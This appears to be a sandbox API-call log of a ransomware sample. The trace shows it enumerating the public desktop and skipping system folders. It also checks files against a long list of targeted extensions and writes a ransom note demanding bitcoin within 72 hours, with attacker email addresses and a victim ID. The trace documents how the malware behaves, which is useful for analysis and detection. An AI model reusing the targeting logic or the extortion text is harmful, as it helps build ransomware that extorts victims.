	[0180.538] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851f099a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x851f099a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85216cc9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.538] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851f099a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x851f099a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85216cc9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.538] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.538] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.539] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0180.539] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1
	[0180.539] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1
	[0180.539] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.539] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.539] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop"
	[0180.540] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop"
	[0180.540] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\"
	[0180.540] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\"
	[0180.540] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*"
	[0180.540] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*" (normalized: "c:\\users\\public\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.541] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\*.*") returned 27
	[0180.541] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.541] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Desktop\\*.*", cchLength=0x1b | out: lpsz="c:\\users\\public\\desktop\\*.*") returned 0x1b
	[0180.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.541] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0180.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.541] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0180.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.542] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0180.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.542] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.542] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0180.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.542] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0180.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.543] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.543] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0180.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.543] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0180.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.543] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0180.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.544] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0180.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.544] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="cache") returned 0x0
	[0180.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.544] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.544] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0180.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.545] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0180.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.545] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0180.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.545] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0180.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.546] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0180.546] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.546] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="programdata") returned 0x0
	[0180.546] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.546] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.546] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.546] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.546] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\"
	[0180.546] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\Users\\Public\\Desktop\\desktop.ini"
	[0180.546] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35
	[0180.547] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.547] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Desktop\\desktop.ini", cchLength=0x23 | out: lpsz="c:\\users\\public\\desktop\\desktop.ini") returned 0x23
	[0180.547] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.547] StrStrW (lpFirst="c:\\users\\public\\desktop\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.547] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\desktop\\desktop.ini" | out: lpString1="c:\\users\\public\\desktop\\desktop.ini") returned="c:\\users\\public\\desktop\\desktop.ini"
	[0180.555] lstrlenW (lpString="c:\\users\\public\\desktop\\desktop.ini") returned 35
	[0180.555] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.556] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.556] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.556] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780f4db2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7811afb2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.556] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.556] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.556] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\"
	[0180.557] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.557] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.557] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.557] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x34 | out: lpsz="c:\\users\\public\\desktop\\help_decrypt_your_files.html") returned 0x34
	[0180.557] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.557] StrStrW (lpFirst="c:\\users\\public\\desktop\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.557] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780ceeaf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780ceeaf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.557] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.558] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.558] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\"
	[0180.558] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.558] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.558] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.558] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x33 | out: lpsz="c:\\users\\public\\desktop\\help_decrypt_your_files.txt") returned 0x33
	[0180.558] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.558] StrStrW (lpFirst="c:\\users\\public\\desktop\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.558] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780ceeaf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780ceeaf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.559] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.559] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.559] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop"
	[0180.559] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Desktop\\*.*") returned="C:\\Users\\Public\\Desktop\\*.*"
	[0180.559] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.560] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.560] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 51
	[0180.560] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.564] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.564] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.567] CloseHandle (hObject=0x380) returned 1
	[0180.567] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.567] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.567] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.568] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.569] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.569] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.569] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
